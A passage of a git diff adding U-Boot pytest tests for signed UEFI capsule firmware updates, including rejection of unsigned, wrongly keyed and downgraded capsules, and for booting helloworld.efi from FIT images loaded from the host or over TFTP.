Arm Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org>, +# adapted to FIT images by Vincent Stehlé <vincent.stehle@arm.com> + +"""U-Boot UEFI: Firmware Update (Signed capsule with FIT images) Test +This test verifies capsule-on-disk firmware update +with signed capsule files containing FIT images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox_flattree') +@pytest.mark.buildconfigspec('efi_capsule_firmware_fit') +@pytest.mark.buildconfigspec('efi_capsule_authenticate') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareSignedFit(): + """Capsule-on-disk firmware update test + """ + + def test_efi_capsule_auth1( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 1 + Update U-Boot on SPI Flash, FIT image format + x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test13'] + with u_boot_console.log.section('Test Case 1-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:New') + + def test_efi_capsule_auth2( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 2 + Update U-Boot on SPI Flash, FIT image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but with an invalid key, + the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test14'] + with u_boot_console.log.section('Test Case 2-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted any way + check_file_removed(u_boot_console, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(u_boot_console, '100000', 'u-boot:Old') + + def test_efi_capsule_auth3( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 3 + Update U-Boot on SPI Flash, FIT image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is not signed, the authentication + should fail and the firmware not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test02'] + with u_boot_console.log.section('Test Case 3-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted any way + check_file_removed(u_boot_console, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(u_boot_console, '100000', 'u-boot:Old') + + def test_efi_capsule_auth4( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 4 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test114'] + with u_boot_console.log.section('Test Case 4-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '3673B45D-6A7C-46F3-9E60-ADABB03F7937' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + verify_content(u_boot_console, '100000', 'u-boot:New') + verify_content(u_boot_console, '150000', 'u-boot-env:New') + + def test_efi_capsule_auth5( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 5 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but fw_version is lower than lowest + supported version, the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test115'] + with u_boot_console.log.section('Test Case 5-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py new file mode 100644 index 00000000000..83a10e160b8 --- /dev/null +++ b/test/py/tests/test_efi_capsule/test_capsule_firmware_signed_raw.py @@ -0,0 +1,192 @@ +# SPDX-License-Identifier: GPL-2.0+ +# Copyright (c) 2021, Linaro Limited +# Author: AKASHI Takahiro <takahiro.akashi@linaro.org> + +"""U-Boot UEFI: Firmware Update (Signed capsule with raw images) Test +This test verifies capsule-on-disk firmware update +with signed capsule files containing raw images +""" + +import pytest +from capsule_common import ( + capsule_setup, + init_content, + place_capsule_file, + exec_manual_update, + check_file_removed, + verify_content, + do_reboot_dtb_specified +) + +@pytest.mark.boardspec('sandbox') +@pytest.mark.buildconfigspec('efi_capsule_firmware_raw') +@pytest.mark.buildconfigspec('efi_capsule_authenticate') +@pytest.mark.buildconfigspec('dfu') +@pytest.mark.buildconfigspec('dfu_sf') +@pytest.mark.buildconfigspec('cmd_efidebug') +@pytest.mark.buildconfigspec('cmd_fat') +@pytest.mark.buildconfigspec('cmd_memory') +@pytest.mark.buildconfigspec('cmd_nvedit_efi') +@pytest.mark.buildconfigspec('cmd_sf') +@pytest.mark.slow +class TestEfiCapsuleFirmwareSignedRaw(): + """Firmware Update (Signed capsule with raw images) Test + """ + + def test_efi_capsule_auth1( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 1 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test11'] + with u_boot_console.log.section('Test Case 1-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 1-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:New') + + def test_efi_capsule_auth2( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 2 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but with an invalid key, + the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test12'] + with u_boot_console.log.section('Test Case 2-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 2-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(u_boot_console, '100000', 'u-boot:Old') + + def test_efi_capsule_auth3( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 3 - Update U-Boot on SPI Flash, raw image format + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is not signed, the authentication + should fail and the firmware not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test02'] + with u_boot_console.log.section('Test Case 3-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_sig.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 3-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + # deleted anyway + check_file_removed(u_boot_console, disk_img, capsule_files) + + # TODO: check CapsuleStatus in CapsuleXXXX + + verify_content(u_boot_console, '100000', 'u-boot:Old') + + def test_efi_capsule_auth4( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 4 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is properly signed, the authentication + should pass and the firmware be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test111', 'Test112'] + with u_boot_console.log.section('Test Case 4-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 4-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + output = u_boot_console.run_command_list([ + 'env set dfu_alt_info "sf 0:0=u-boot-bin raw 0x100000 0x50000;' + 'u-boot-env raw 0x150000 0x200000"', + 'efidebug capsule esrt']) + + # ensure that SANDBOX_UBOOT_IMAGE_GUID is in the ESRT. + assert '09D7CF52-0720-4710-91D1-08469B7FE9C8' in ''.join(output) + assert 'ESRT: fw_version=5' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=3' in ''.join(output) + + # ensure that SANDBOX_UBOOT_ENV_IMAGE_GUID is in the ESRT. + assert '5A7021F5-FEF2-48B4-AABA-832E777418C0' in ''.join(output) + assert 'ESRT: fw_version=10' in ''.join(output) + assert 'ESRT: lowest_supported_fw_version=7' in ''.join(output) + + verify_content(u_boot_console, '100000', 'u-boot:New') + verify_content(u_boot_console, '150000', 'u-boot-env:New') + + def test_efi_capsule_auth5( + self, u_boot_config, u_boot_console, efi_capsule_data): + """Test Case 5 - Update U-Boot on SPI Flash, raw image format with version information + 0x100000-0x150000: U-Boot binary (but dummy) + + If the capsule is signed but fw_version is lower than lowest + supported version, the authentication should fail and the firmware + not be updated. + """ + disk_img = efi_capsule_data + capsule_files = ['Test113'] + with u_boot_console.log.section('Test Case 5-a, before reboot'): + capsule_setup(u_boot_console, disk_img, '0x0000000000000004') + init_content(u_boot_console, '100000', 'u-boot.bin.old', 'Old') + place_capsule_file(u_boot_console, capsule_files) + + do_reboot_dtb_specified(u_boot_config, u_boot_console, 'test_ver.dtb') + + capsule_early = u_boot_config.buildconfig.get( + 'config_efi_capsule_on_disk_early') + with u_boot_console.log.section('Test Case 5-b, after reboot'): + if not capsule_early: + exec_manual_update(u_boot_console, disk_img, capsule_files) + + check_file_removed(u_boot_console, disk_img, capsule_files) + + verify_content(u_boot_console, '100000', 'u-boot:Old') diff --git a/test/py/tests/test_efi_capsule/version.dts b/test/py/tests/test_efi_capsule/version.dts new file mode 100644 index 00000000000..07850cc6064 --- /dev/null +++ b/test/py/tests/test_efi_capsule/version.dts @@ -0,0 +1,24 @@ +// SPDX-License-Identifier: GPL-2.0+ + +/dts-v1/; +/plugin/; + +&{/} { + firmware-version { + image1 { + lowest-supported-version = <3>; + image-index = <1>; + image-type-id = "09D7CF52-0720-4710-91D1-08469B7FE9C8"; + }; + image2 { + lowest-supported-version = <7>; + image-index = <2>; + image-type-id = "5A7021F5-FEF2-48B4-AABA-832E777418C0"; + }; + image3 { + lowest-supported-version = <3>; + image-index = <1>; + image-type-id = "3673B45D-6A7C-46F3-9E60-ADABB03F7937"; + }; + }; +}; diff --git a/test/py/tests/test_efi_fit.py b/test/py/tests/test_efi_fit.py new file mode 100644 index 00000000000..0ad483500f8 --- /dev/null +++ b/test/py/tests/test_efi_fit.py @@ -0,0 +1,466 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2019, Cristian Ciocaltea <cristian.ciocaltea@gmail.com> +# +# Work based on: +# - test_net.py +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. +# - test_fit.py +# Copyright (c) 2013, Google Inc. +# +# Test launching UEFI binaries from FIT images. + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, the parts +that rely on network will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +# Additionally, when the 'size' is not available, the file will be generated +# automatically in the TFTP root directory, as specified by the 'dn' field. +env__efi_fit_tftp_file = { + 'fn': 'test-efi-fit.img', # File path relative to TFTP root + 'size': 3831, # File size + 'crc32': '9fa3f79c', # Checksum using CRC-32 algorithm, optional + 'addr': 0x40400000, # Loading address, integer, optional + 'dn': 'tftp/root/dir', # TFTP root directory path, optional +} +""" + +import os.path +import pytest +import u_boot_utils as util + +# Define the parametrized ITS data to be used for FIT images generation. +ITS_DATA = ''' +/dts-v1/; + +/ { + description = "EFI image with FDT blob"; + #address-cells = <1>; + + images { + efi { + description = "Test EFI"; + data = /incbin/("%(efi-bin)s"); + type = "%(kernel-type)s"; + arch = "%(sys-arch)s"; + os = "efi"; + compression = "%(efi-comp)s"; + load = <0x0>; + entry = <0x0>; + }; + fdt { + description = "Test FDT"; + data = /incbin/("%(fdt-bin)s"); + type = "flat_dt"; + arch = "%(sys-arch)s"; + compression = "%(fdt-comp)s"; + }; + }; + + configurations { + default = "config-efi-fdt"; + config-efi-fdt { + description = "EFI FIT w/ FDT"; + kernel = "efi"; + fdt = "fdt"; + }; + config-efi-nofdt { + description = "EFI FIT w/o FDT"; + kernel = "efi"; + }; + }; +}; +''' + +# Define the parametrized FDT data to be used for DTB images generation. +FDT_DATA = ''' +/dts-v1/; + +/ { + #address-cells = <1>; + #size-cells = <1>; + + model = "%(sys-arch)s %(fdt_type)s EFI FIT Boot Test"; + compatible = "%(sys-arch)s"; + + reset@0 { + compatible = "%(sys-arch)s,reset"; + reg = <0 4>; + }; +}; +''' + +@pytest.mark.buildconfigspec('bootm_efi') +@pytest.mark.buildconfigspec('cmd_bootefi_hello_compile') +@pytest.mark.buildconfigspec('fit') +@pytest.mark.notbuildconfigspec('generate_acpi_table') +@pytest.mark.requiredtool('dtc') +def test_efi_fit_launch(u_boot_console): + """Test handling of UEFI binaries inside FIT images. + + The tests are trying to launch U-Boot's helloworld.efi embedded into + FIT images, in uncompressed or gzip compressed format. + + Additionally, a sample FDT blob is created and embedded into the above + mentioned FIT images, in uncompressed or gzip compressed format. + + For more details, see launch_efi(). + + The following test cases are currently defined and enabled: + - Launch uncompressed FIT EFI & internal FDT + - Launch uncompressed FIT EFI & FIT FDT + - Launch compressed FIT EFI & internal FDT + - Launch compressed FIT EFI & FIT FDT + """ + + def net_pre_commands(): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment + at the beginning of this file. + """ + + init_usb = cons.config.env.get('env__net_uses_usb', False) + if init_usb: + cons.run_command('usb start') + + init_pci = cons.config.env.get('env__net_uses_pci', False) + if init_pci: + cons.run_command('pci enum') + + def net_dhcp(): + """Execute the dhcp command. + + The boardenv_* file may be used to enable/disable DHCP; see the + comment at the beginning of this file. + """ + + has_dhcp = cons.config.buildconfig.get('config_cmd_dhcp', 'n') == 'y' + if not has_dhcp: + cons.log.warning('CONFIG_CMD_DHCP != y: Skipping DHCP network setup') + return False + + test_dhcp = cons.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + cons.log.info('No DHCP server available') + return False + + cons.run_command('setenv autoload no') + output = cons.run_command('dhcp') + assert 'DHCP client bound to address ' in output + return True + + def net_setup_static(): + """Set up a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + has_dhcp = cons.config.buildconfig.get('config_cmd_dhcp', 'n') == 'y' + if not has_dhcp: + cons.log.warning('CONFIG_NET != y: Skipping static network setup') + return False + + env_vars = cons.config.env.get('env__net_static_env_vars', None) + if not env_vars: + cons.log.info('No static network configuration is defined') + return False + + for (var, val) in env_vars: + cons.run_command('setenv %s %s' % (var, val)) + return True + + def make_fpath(file_name): + """Compute the path of a given (temporary) file. + + Args: + file_name -- The name of a file within U-Boot build dir. + Return: + The computed file path. + """ + + return os.path.join(cons.config.build_dir, file_name) + + def make_efi(fname, comp): + """Create an UEFI binary. + + This simply copies lib/efi_loader/helloworld.efi into U-Boot + build dir and, optionally, compresses the file using gzip. + + Args: + fname -- The target file name within U-Boot build dir. + comp -- Flag to enable gzip compression. + Return: + The path of the created file. + """ + + bin_path = make_fpath(fname) + util.run_and_log(cons, + ['cp', make_fpath('lib/efi_loader/helloworld.efi'), + bin_path]) + if comp: + util.run_and_log(cons, ['gzip', '-f', bin_path]) + bin_path += '.gz' + return bin_path + + def make_dtb(fdt_type, comp): + """Create a sample DTB file. + + Creates a DTS file and compiles it to a DTB. + + Args: + fdt_type -- The type of the FDT, i.e. internal, user. + comp -- Flag to enable gzip compression. + Return: + The path of the created file. + """ + + # Generate resources referenced by FDT. + fdt_params = { + 'sys-arch': sys_arch, + 'fdt_type': fdt_type, + } + + # Generate a test FDT file. + dts = make_fpath('test-efi-fit-%s.dts' % fdt_type) + with open(dts, 'w', encoding='ascii') as file: + file.write(FDT_DATA % fdt_params) + + # Build the test FDT. + dtb = make_fpath('test-efi-fit-%s.dtb' % fdt_type) + util.run_and_log(cons, ['dtc', '-I', 'dts', '-O', 'dtb', '-o', dtb, dts]) + if comp: + util.run_and_log(cons, ['gzip', '-f', dtb]) + dtb += '.gz' + return dtb + + def make_fit(comp): + """Create a sample FIT image. + + Runs 'mkimage' to create a FIT image within U-Boot build dir. + Args: + comp -- Enable gzip compression for the EFI binary and FDT blob. + Return: + The path of the created file. + """ + + # Generate resources referenced by ITS. + its_params = { + 'sys-arch': sys_arch, + 'efi-bin': os.path.basename(make_efi('test-efi-fit-helloworld.efi', comp)), + 'kernel-type': 'kernel' if comp else 'kernel_noload', + 'efi-comp': 'gzip' if comp else 'none', + 'fdt-bin': os.path.basename(make_dtb('user', comp)), + 'fdt-comp': 'gzip' if comp else 'none', + } + + # Generate a test ITS file. + its_path = make_fpath('test-efi-fit-helloworld.its') + with open(its_path, 'w', encoding='ascii') as file: + file.write(ITS_DATA % its_params) + + # Build the test ITS. + fit_path = make_fpath('test-efi-fit-helloworld.fit') + util.run_and_log( + cons, [make_fpath('tools/mkimage'), '-f', its_path, fit_path]) + return fit_path + + def load_fit_from_host(fit): + """Load the FIT image using the 'host load' command and return its address. + + Args: + fit -- Dictionary describing the FIT image to load, see + env__efi_fit_test_file in the comment at the beginning of + this file. + Return: + The address where the file has been loaded. + """ + + addr = fit.get('addr', None) + if not addr: + addr = util.find_ram_base(cons) + + output = cons.run_command( + 'host load hostfs - %x %s/%s' % (addr, fit['dn'], fit['fn'])) + expected_text = ' bytes read' + size = fit.get('size', None) + if size: + expected_text = '%d' % size + expected_text + assert expected_text in output + + return addr + + def load_fit_from_tftp(fit): + """Load the FIT image using the tftpboot command and return its address. + + The file is downloaded from the TFTP server, its size and optionally its + CRC32 are validated. + + Args: + fit -- Dictionary describing the FIT image to load, see env__efi_fit_tftp_file + in the comment at the beginning of this file. + Return: + The address where the file has been loaded. + """ + + addr = fit.get('addr', None) + if not addr: + addr = util.find_ram_base(cons) + + file_name = fit['fn'] + output = cons.run_command('tftpboot %x %s' % (addr, file_name)) + expected_text = 'Bytes transferred = ' + size = fit.get('size', None) + if size: + expected_text += '%d' % size + assert expected_text in output + + expected_crc = fit.get('crc32', None) + if not expected_crc: + return addr + + if cons.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return addr + + output = cons.run_command('crc32 $fileaddr $filesize') + assert expected_crc in output + + return addr + + def launch_efi(enable_fdt, enable_comp): + """Launch U-Boot's helloworld.efi binary from a FIT image. + + An external image file can be downloaded from TFTP, when related + details are provided by the boardenv_* file; see the comment at the + beginning of this file. + + If the size of the TFTP file is not provided within env__efi_fit_tftp_file, + the test image is generated automatically and placed in the TFTP root + directory specified via the 'dn' field. + + When running the tests on Sandbox, the image file is loaded directly + from the host filesystem. + + Once the load address is available on U-Boot console, the 'bootm' + command is executed for either 'config-efi-fdt' or 'config-efi-nofdt' + FIT configuration, depending on the value of the 'enable_fdt' function + argument. + + Eventually the 'Hello, world' message is expected in the U-Boot console. + + Args: + enable_fdt -- Flag to enable using the FDT blob inside FIT image. + enable_comp -- Flag to enable GZIP compression on EFI and FDT + generated content. + """ + + with cons.log.section('FDT=%s;COMP=%s' % (enable_fdt, enable_comp)): + if is_sandbox: + fit = { + 'dn': cons.config.build_dir, + } + else: + # Init networking. + net_pre_commands() + net_set_up = net_dhcp() + net_set_up = net_setup_static() or net_set_up + if not net_set_up: + pytest.skip('Network not initialized') + + fit = cons.config.env.get('env__efi_fit_tftp_file', None) + if not fit: + pytest.skip('No env__efi_fit_tftp_file binary specified in environment') + + size = fit.get('size', None) + if not size: + if not fit.get('dn', None): + pytest.skip('Neither "size", nor "dn" info provided in env__efi_fit_tftp_file') + + # Create test FIT image. + fit_path = make_fit(enable_comp) + fit['fn'] = os.path.basename(fit_path) + fit['size'] = os.path.getsize(fit_path) + + # Copy image to TFTP root directory. + if fit['dn'] != cons.config.build_dir: + util.run_and_log(cons, ['mv', '-f', fit_path, '%s/' % fit['dn']]) + + # Load FIT image. + addr = load_fit_from_host(fit) if is_sandbox else load_fit_from_tftp(fit) + + # Select boot configuration. + fit_config = 'config-efi-fdt' if enable_fdt else 'config-efi-nofdt' + + # Try booting. + output = cons.run_command('bootm %x#%s' % (addr, fit_config)) + if enable_fdt: + assert 'Booting using the fdt blob' in output + assert 'Hello, world' in output + assert '## Application failed' not in output + cons.restart_uboot() + + cons = u_boot_console + # Array slice removes leading/trailing quotes. + sys_arch = cons.config.buildconfig.get('config_sys_arch', '"sandbox"')[1:-1] + if sys_arch == 'arm': + arm64 = cons.config.buildconfig.get('config_arm64') + if arm64: + sys_arch = 'arm64' + + is_sandbox = sys_arch == 'sandbox' + + if is_sandbox: + old_dtb = cons.config.dtb + + try: + if is_sandbox: + # Use our own device tree file, will be restored afterwards. + control_dtb = make_dtb('internal', False) + cons.config.dtb = control_dtb + + # Run tests + # - fdt OFF, gzip OFF + launch_efi(False, False) + # - fdt ON, gzip OFF + launch_efi(True, False) + + if is_sandbox: + # - fdt OFF, gzip ON + launch_efi(False, True) + # - fdt ON, gzip ON + launch_efi(True, True) + + finally: + if is_sandbox: + # Go back to the original U-Boot with the correct dtb. + cons.config.dtb = old_dtb + cons.restart_uboot() diff --git a/test/py/tests/test_efi_loader.py b/test/py/tests/test_efi_loader.py new file mode 100644 index 00000000000..85473a9049b --- /dev/null +++ b/test/py/tests/test_efi_loader.py @@ -0,0 +1,204 @@ +# SPDX-License-Identifier: GPL-2.0 +# Copyright (c) 2016, NVIDIA CORPORATION. All rights reserved. +# Copyright (c) 2016, Alexander Graf <agraf@suse.de> +# +# based on test_net.py. + +# Test efi loader implementation + +""" +Note: This test relies on boardenv_* containing configuration values to define +which network environment is available for testing. Without this, the parts +that rely on network will be automatically skipped. + +For example: + +# Boolean indicating whether the Ethernet device is attached to USB, and hence +# USB enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_usb = False + +# Boolean indicating whether the Ethernet device is attached to PCI, and hence +# PCI enumeration needs to be performed prior to network tests. +# This variable may be omitted if its value is False. +env__net_uses_pci = True + +# True if a DHCP server is attached to the network, and should be tested. +# If DHCP testing is not possible or desired, this variable may be omitted or +# set to False. +env__net_dhcp_server = True + +# A list of environment variables that should be set in order to configure a +# static IP. If solely relying on DHCP, this variable may be omitted or set to +# an empty list. +env__net_static_env_vars = [ + ('ipaddr', '10.0.0.100'), + ('netmask', '255.255.255.0'), + ('serverip', '10.0.0.1'), +] + +# Details regarding a file that may be read from a TFTP server. This variable +# may be omitted or set to None if TFTP testing is not possible or desired. +env__efi_loader_helloworld_file = { + 'fn': 'lib/efi_loader/helloworld.efi', # file name + 'size': 5058624, # file length in bytes + 'crc32': 'c2244b26', # CRC32 check sum + 'addr': 0x40400000, # load address +} +""" + +import pytest +import u_boot_utils + +net_set_up = False + +def test_efi_pre_commands(u_boot_console): + """Execute any commands required to enable network hardware. + + These commands are provided by the boardenv_* file; see the comment at the + beginning of this file. + """ + + init_usb = u_boot_console.config.env.get('env__net_uses_usb', False) + if init_usb: + u_boot_console.run_command('usb start') + + init_pci = u_boot_console.config.env.get('env__net_uses_pci', False) + if init_pci: + u_boot_console.run_command('pci enum') + +@pytest.mark.buildconfigspec('cmd_dhcp') +def test_efi_setup_dhcp(u_boot_console): + """Set up the network using DHCP. + + The boardenv_* file may be used to enable/disable this test; see the + comment at the beginning of this file. + """ + + test_dhcp = u_boot_console.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + env_vars = u_boot_console.config.env.get('env__net_static_env_vars', None) + if not env_vars: + pytest.skip('No DHCP server available') + return + + u_boot_console.run_command('setenv autoload no') + output = u_boot_console.run_command('dhcp') + assert 'DHCP client bound to address ' in output + + global net_set_up + net_set_up = True + +@pytest.mark.buildconfigspec('net') +def test_efi_setup_static(u_boot_console): + """Set up the network using a static IP configuration. + + The configuration is provided by the boardenv_* file; see the comment at + the beginning of this file. + """ + + env_vars = u_boot_console.config.env.get('env__net_static_env_vars', None) + if not env_vars: + test_dhcp = u_boot_console.config.env.get('env__net_dhcp_server', False) + if not test_dhcp: + pytest.skip('No static network configuration is defined') + return None + + for (var, val) in env_vars: + u_boot_console.run_command('setenv %s %s' % (var, val)) + + global net_set_up + net_set_up = True + +def fetch_tftp_file(u_boot_console, env_conf): + """Grab an env described file via TFTP and return its address + + A file as described by an env config <env_conf> is downloaded from the TFTP + server. The address to that file is returned. + """ + if not net_set_up: + pytest.skip('Network not initialized') + + f = u_boot_console.config.env.get(env_conf, None) + if not f: + pytest.skip('No %s binary specified in environment' % env_conf) + + addr = f.get('addr', None) + if not addr: + addr = u_boot_utils.find_ram_base(u_boot_console) + + fn = f['fn'] + output = u_boot_console.run_command('tftpboot %x %s' % (addr, fn)) + expected_text = 'Bytes transferred = ' + sz = f.get('size', None) + if sz: + expected_text += '%d' % sz + assert expected_text in output + + expected_crc = f.get('crc32', None) + if not expected_crc: + return addr + + if u_boot_console.config.buildconfig.get('config_cmd_crc32', 'n') != 'y': + return addr + + output = u_boot_console.run_command('crc32 %x $filesize' % addr) + assert expected_crc in output + + return addr + +@pytest.mark.buildconfigspec('of_control') 